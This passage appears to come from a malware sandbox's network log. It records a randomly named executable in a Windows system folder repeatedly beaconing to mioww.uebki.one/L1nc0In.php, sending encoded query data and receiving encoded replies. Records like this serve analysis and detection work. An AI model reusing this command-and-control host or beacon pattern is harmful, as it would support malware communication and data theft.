                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CR9kWSi%2FSFn7kQPoGjiFUN4Uh%2FpzqpPuIgDxR7BGMVgrn4NsaNAJiNw4EkVJZQi7waDF9Nn0WhPhzjuTKmwbq1SW3M2kmyxSVS7eeQWnaWJlkIyE245HwnjAN1jLSw6Eog8%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb9133ad0142fc-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye
                              Aug 31, 2024 10:14:28.705043077 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              30 | 192.168.2.4 | 49767 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:33.718046904 CEST | 2107 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:14:34.443567991 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:34 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EG%2FQYyUaG1QGqGyNZiWOGXwbg3%2FantZrfJ02u8%2BEoc80KfdNkAvlFMzv%2Bs79UpXweXGVss5uhEl1kDI3R99x1Oyom68J7u6B4dFvi9Tw588wwf1LH9K%2FvcZVFittiZYFKm4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb91574e577271-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              31 | 192.168.2.4 | 49768 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:39.452686071 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:40.161600113 CEST | 725 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TzFy1TzG7nD1JA9C2shUUyjdIWZfzRI9FboduDtlqt8jfeW6nVlfC%2FFoJXSVnpyegAkUWUIHfWG4txDfUSnXdreJeyLH8FbxrcAkpzTGnqI%2Ffwkp0vSQ6vaVXpDMF2NiO3s%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb917b1a8f8c8f-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              32 | 192.168.2.4 | 49769 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:45.172364950 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:45.912075043 CEST | 737 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:45 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nu8KLPpygcxt4K8gZHgAEo0TOd1K%2F3Cm%2F7%2F%2F7lg3o5luf8IFj%2BWND9KIifGCI5rSCoPN%2BvL0x8i9cDF%2FfufulcW1pMX3ihWduIuQutbcUX79%2BQ4OsgsPqbsAbp0XAdPJYQY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb919ee9be7d02-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              33 | 192.168.2.4 | 49770 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:50.925854921 CEST | 2107 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca= [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:14:51.694890976 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:51 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O711hKaTqHjHmFIpgZvGbN1bKq7WPzjQ9UZAYRPaKmemv%2FRYUlCn7RGxMah8GxJ3hroCARAmSVBoIJ4%2B%2BjK9Ivn9D8RnEKOoZs%2Ft9LiuKwILDlhgWECl9Z9aP4jgbwOCmsA%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb91c2ed5a8c1e-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              34 | 192.168.2.4 | 49771 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:14:56.705468893 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:57.466830969 CEST | 729 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:57 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VEoWROtRPmd6o0fvJ2003rc9fYRyzxUcyu0pB%2BbDcxLErpJOnUJ5n47KBkBaDe8wniW7%2BiuHBN%2BgWkpatG1AxqaDNtMxPy6fE3mdpKG4q1sd305rjXP3qgrs%2F10aa4bpUz0%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb91e6f8ce42fe-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              35 | 192.168.2.4 | 49772 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:02.483905077 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:03.243643045 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:03 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q%2B0cOhAVf9gqp8iorIoVpliZDdkDSJHGvJMNpdOvnMzfPqx3eAntnAFxVt9GS2UXqW3nUUOpCRdBUTKqgHGPW1Hx%2B4RyQ8pY%2FufUNO5Y5aC6oZ5ZjlFa%2Fie%2BCIIZg3yN8BI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb920b4bae8c24-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              36 | 192.168.2.4 | 49773 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:08.265074968 CEST | 2107 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:15:09.023008108 CEST | 735 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fufqS0OWQ%2BPJK%2BbDQZG2xYiPi%2B%2BFBFmVcP1j2YidXb%2BwTh20pn1x8vKXscpFzkyZndAB2kF7hvF%2B606g2XnrquMQsosyNOf%2FOHRh83XL9Kc9FuU7OfMHhe7umOyGe8q6sDg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb922f4ce9184d-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              37 | 192.168.2.4 | 49774 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:14.032521009 CEST | 2080 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:15:14.768651009 CEST | 731 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:14 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqSdhTgnItLrfg%2FYZxywxMzhDL8fc8OsqKoT%2BGIr076WKRuOHrCqfqcBH4poP8cAm%2BUHOcdQ9Q7nBa36okobVca3Iyy2JDbxZeQhjDR0atKeUaO54%2Bvl%2FIgxdc5rxpkjVw4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb925338620cb4-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              38 | 192.168.2.4 | 49775 | 188.114.97.3 | 80 | 7632 | C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 31, 2024 10:15:19.813437939 CEST | 2131 | OUT | GET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=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 [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:15:20.526448965 CEST | 735 | IN | HTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:15:20 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ovT5Aboyrl1IoFYizzQJS9p6onsyqu%2F%2Fwk41FijBJI2Gzfu98HJeacagbuceQqHCHIJ%2BJ7x13U%2Fut%2BtDCn2XxS%2FTZlRFWxKW%2BnOJk4Dl6ui1PnVNcahk29qPKFrRet9bf2I%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
